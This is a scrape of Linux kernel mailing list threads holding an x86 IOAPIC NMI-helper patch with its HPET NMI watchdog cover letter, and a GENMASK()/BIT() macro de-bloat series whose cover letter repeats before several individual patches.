To implement an HPET based NMI watchdog, the HPET code will need to
reconfigure an IOAPIC pin to NMI mode. Add a function that allows driver
code to configure an IOAPIC pin for NMI delivery mode.
The caller can choose whether to invoke NMIs on the BSP or broadcast on
all CPUs in the system.
(Disclaimer: Some of this code was written with the help of Kiro, an AI
coding assistant)
Signed-off-by: Alexander Graf <graf@amazon.com>
---
arch/x86/include/asm/io_apic.h | 2 ++
arch/x86/kernel/apic/io_apic.c | 32 ++++++++++++++++++++++++++++++++
2 files changed, 34 insertions(+)
diff --git a/arch/x86/include/asm/io_apic.h b/arch/x86/include/asm/io_apic.h
index 0d806513c4b3..58cfb338bf39 100644
--- a/arch/x86/include/asm/io_apic.h
+++ b/arch/x86/include/asm/io_apic.h
@@ -158,6 +158,8 @@ extern void mp_save_irq(struct mpc_intsrc *m);
extern void disable_ioapic_support(void);
+extern int ioapic_set_nmi(u32 gsi, bool broadcast);
+
extern void __init io_apic_init_mappings(void);
extern unsigned int native_io_apic_read(unsigned int apic, unsigned int reg);
extern void native_restore_boot_irq_mode(void);
diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
index 28f934f05a85..5b303e5d2f3f 100644
--- a/arch/x86/kernel/apic/io_apic.c
+++ b/arch/x86/kernel/apic/io_apic.c
@@ -2951,6 +2951,38 @@ int mp_irqdomain_ioapic_idx(struct irq_domain *domain)
return (int)(long)domain->host_data;
}
+/**
+ * ioapic_set_nmi - Configure an IOAPIC pin for NMI delivery
+ * @gsi: Global System Interrupt number
+ * @broadcast: true to broadcast to all CPUs, false to send to CPU 0 only
+ *
+ * Configures the specified GSI for NMI delivery mode.
+ *
+ * Returns 0 on success, negative error code on failure.
+ */
+int ioapic_set_nmi(u32 gsi, bool broadcast)
+{
+ struct IO_APIC_route_entry entry = { };
+ int ioapic_idx, pin;
+
+ ioapic_idx = mp_find_ioapic(gsi);
+ if (ioapic_idx < 0)
+ return -ENODEV;
+
+ pin = mp_find_ioapic_pin(ioapic_idx, gsi);
+ if (pin < 0)
+ return -ENODEV;
+
+ entry.delivery_mode = APIC_DELIVERY_MODE_NMI;
+ entry.destid_0_7 = broadcast ? 0xFF : boot_cpu_physical_apicid;
+ entry.dest_mode_logical = 0;
+ entry.masked = 0;
+
+ ioapic_write_entry(ioapic_idx, pin, entry);
+
+ return 0;
+}
+
const struct irq_domain_ops mp_ioapic_irqdomain_ops = {
.alloc = mp_irqdomain_alloc,
.free = mp_irqdomain_free,
--
2.47.1
Amazon Web Services Development Center Germany GmbH
Tamara-Danz-Str. 13
10243 Berlin
Geschaeftsfuehrung: Christof Hellmis, Andreas Stieger
Eingetragen am Amtsgericht Charlottenburg unter HRB 257764 B
Sitz: Berlin
Ust-ID: DE 365 538 597
|
{
"author": "Alexander Graf <graf@amazon.com>",
"date": "Mon, 2 Feb 2026 17:48:02 +0000",
"thread_id": "20260202174316.65044-2-graf@amazon.com.mbox.gz"
}
|
lkml
|
[PATCH 0/2] Add HPET NMI Watchdog support
|
The current NMI watchdog relies on performance counters and consistently
occupies one on each CPU. When running virtual machines, we want to pass
performance counters to virtual machines so they can make use of them.
In addition the host system wants to use performance counters to check
the system to identify when anything looks abnormal, such as split
locks.
That makes PMCs a precious resource. So any PMC we can free up is a PMC
we can use for something useful. That made me look at the NMI watchdog.
The PMC based NMI watchdog implementation does not actually need any
performance counting. It just needs a per-CPU NMI timer source. X86
systems can make anything that emits an interrupt descriptor (IOAPIC,
MSI(-X), etc) become an NMI source. So any time goes. Including the
HPET. And while they can't really operate per-CPU, in almost all cases
you only really want the NMI on *all* CPUs, rather than per-CPU.
So I took a stab at building an HPET based NMI watchdog. In my (QEMU
based) testing, it's fully functional and can successfully detect when
CPUs get stuck. It even survives suspend/resume cycles.
For now, its enablement is a config time option because the hardlockup
framework does not support dynamic switching of multiple detectors.
That's ok for our use case. But maybe something for the interested
reader to tackle eventually :).
You can enable the HPET watchdog by default by setting
CONFIG_HARDLOCKUP_DETECTOR_HPET_DEFAULT=y
or passing "hpet=watchdog" to the kernel command line. When active, it
will emit a kernel log message to indicate it works:
[ 0.179176] hpet: HPET watchdog initialized on timer 0, GSI 2
The HPET can only be in either watchdog or generic mode. I am a bit
worried about IO-APIC pin allocation logic, so I opted to reuse the
generic timer pin. And that means I'm effectively breaking the normal
interrupt delivery path. so the easy way out was to say when watchdog is
active, PIT and HPET are not available as timer sources. Which is ok on
modern systems. There are way too many (unreliable) timer sources on x86
already. Trimming a few surely won't hurt.
I'm open to inputs on how to make the HPET multi-purpose though, in case
anyone feels strongly about it.
Alex
Alexander Graf (2):
x86/ioapic: Add NMI delivery configuration helper
hpet: Add HPET-based NMI watchdog support
.../admin-guide/kernel-parameters.txt | 5 +-
arch/x86/Kconfig | 19 ++
arch/x86/include/asm/io_apic.h | 2 +
arch/x86/kernel/apic/io_apic.c | 32 ++++
arch/x86/kernel/hpet.c | 172 ++++++++++++++++++
arch/x86/kernel/i8253.c | 9 +
drivers/char/hpet.c | 3 +
include/linux/hpet.h | 14 ++
8 files changed, 255 insertions(+), 1 deletion(-)
--
2.47.1
Amazon Web Services Development Center Germany GmbH
Tamara-Danz-Str. 13
10243 Berlin
Geschaeftsfuehrung: Christof Hellmis, Andreas Stieger
Eingetragen am Amtsgericht Charlottenburg unter HRB 257764 B
Sitz: Berlin
Ust-ID: DE 365 538 597
|
On 02.02.26 18:43, Alexander Graf wrote:
Sorry for the resend. I caught an issue while sending out the series,
hit ctrl-c before thinking and suddenly had a half sent series. Discard
this one. Happy review on the real, full one :)
Alex
Amazon Web Services Development Center Germany GmbH
Tamara-Danz-Str. 13
10243 Berlin
Geschaeftsfuehrung: Christof Hellmis, Andreas Stieger
Eingetragen am Amtsgericht Charlottenburg unter HRB 257764 B
Sitz: Berlin
Ust-ID: DE 365 538 597
|
{
"author": "Alexander Graf <graf@amazon.com>",
"date": "Mon, 2 Feb 2026 18:49:13 +0100",
"thread_id": "20260202174316.65044-2-graf@amazon.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
Change '(x - 1) + x' to '2 * (x - 1) + 1' to avoid expanding the
non-trivial __type_half_max() twice.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/overflow.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/include/linux/overflow.h b/include/linux/overflow.h
index 736f633b2d5f..4f014d55ab25 100644
--- a/include/linux/overflow.h
+++ b/include/linux/overflow.h
@@ -31,7 +31,7 @@
* credit to Christian Biere.
*/
#define __type_half_max(type) ((type)1 << (8*sizeof(type) - 1 - is_signed_type(type)))
-#define __type_max(T) ((T)((__type_half_max(T) - 1) + __type_half_max(T)))
+#define __type_max(T) ((T)(2 * (__type_half_max(T) - 1) + 1))
#define type_max(t) __type_max(typeof(t))
#define __type_min(T) ((T)((T)-type_max(T)-(T)1))
#define type_min(t) __type_min(typeof(t))
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:18 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
Since the type is always unsigned (T)-1 is always the correct value
so there is no need to use type_max().
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/bits.h | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/include/linux/bits.h b/include/linux/bits.h
index a40cc861b3a7..697318f2a47d 100644
--- a/include/linux/bits.h
+++ b/include/linux/bits.h
@@ -45,8 +45,7 @@
*/
#define GENMASK_TYPE(t, h, l) \
((t)(GENMASK_INPUT_CHECK(h, l) + \
- (type_max(t) << (l) & \
- type_max(t) >> (BITS_PER_TYPE(t) - 1 - (h)))))
+ ((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h)))))
#define GENMASK(h, l) GENMASK_TYPE(unsigned long, h, l)
#define GENMASK_ULL(h, l) GENMASK_TYPE(unsigned long long, h, l)
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:25 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
Compile-time tests being added to BIT() make it an 'integer constant
expression' rather than a pre-processor expression for W=1 builds.
Change the BIT(PLANE_INDEX_BITS) != VIDEO_MAX_PLANES test to use
static_assert() so the code compiles.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
drivers/media/common/videobuf2/videobuf2-core.c | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/drivers/media/common/videobuf2/videobuf2-core.c b/drivers/media/common/videobuf2/videobuf2-core.c
index 2df566f409b6..90dedab2aeb2 100644
--- a/drivers/media/common/videobuf2/videobuf2-core.c
+++ b/drivers/media/common/videobuf2/videobuf2-core.c
@@ -37,9 +37,9 @@
#define MAX_BUFFER_INDEX BIT_MASK(30 - PLANE_INDEX_SHIFT)
#define BUFFER_INDEX_MASK (MAX_BUFFER_INDEX - 1)
-#if BIT(PLANE_INDEX_BITS) != VIDEO_MAX_PLANES
-#error PLANE_INDEX_BITS order must be equal to VIDEO_MAX_PLANES
-#endif
+
+static_assert(BIT(PLANE_INDEX_BITS) == VIDEO_MAX_PLANES,
+ "PLANE_INDEX_BITS order must be equal to VIDEO_MAX_PLANES");
static int debug;
module_param(debug, int, 0644);
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:20 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
The check for invalid 'compile time constant' parameters can easily be
changed to return 'failed' rather than generating a compile time error.
Add some tests for negative, swapped and overlarge values.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
lib/tests/test_bits.c | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/lib/tests/test_bits.c b/lib/tests/test_bits.c
index 4d3a895f490c..9642c55f5487 100644
--- a/lib/tests/test_bits.c
+++ b/lib/tests/test_bits.c
@@ -144,6 +144,22 @@ static void genmask_input_check_test(struct kunit *test)
BUILD_BUG_ON(GENMASK_INPUT_CHECK(100, 80, 128) != 0);
BUILD_BUG_ON(GENMASK_INPUT_CHECK(110, 65, 128) != 0);
BUILD_BUG_ON(GENMASK_INPUT_CHECK(127, 0, 128) != 0);
+
+ /*
+ * Invalid input
+ * Change GENMASK_INPUT_CHECK() return 'fail' rather than
+ * generating a compile-time error.
+ */
+#define GENMASK_INPUT_CHECK_FAIL() 1
+ z = 0;
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 31, -1, 32) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 0, 1, 32) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 8, 0, 8) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 16, 0, 16) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 32, 0, 32) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 64, 0, 64) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 128, 0, 128) == 0);
+#undef GENMASK_INPUT_CHECK_FAIL
}
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:31 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
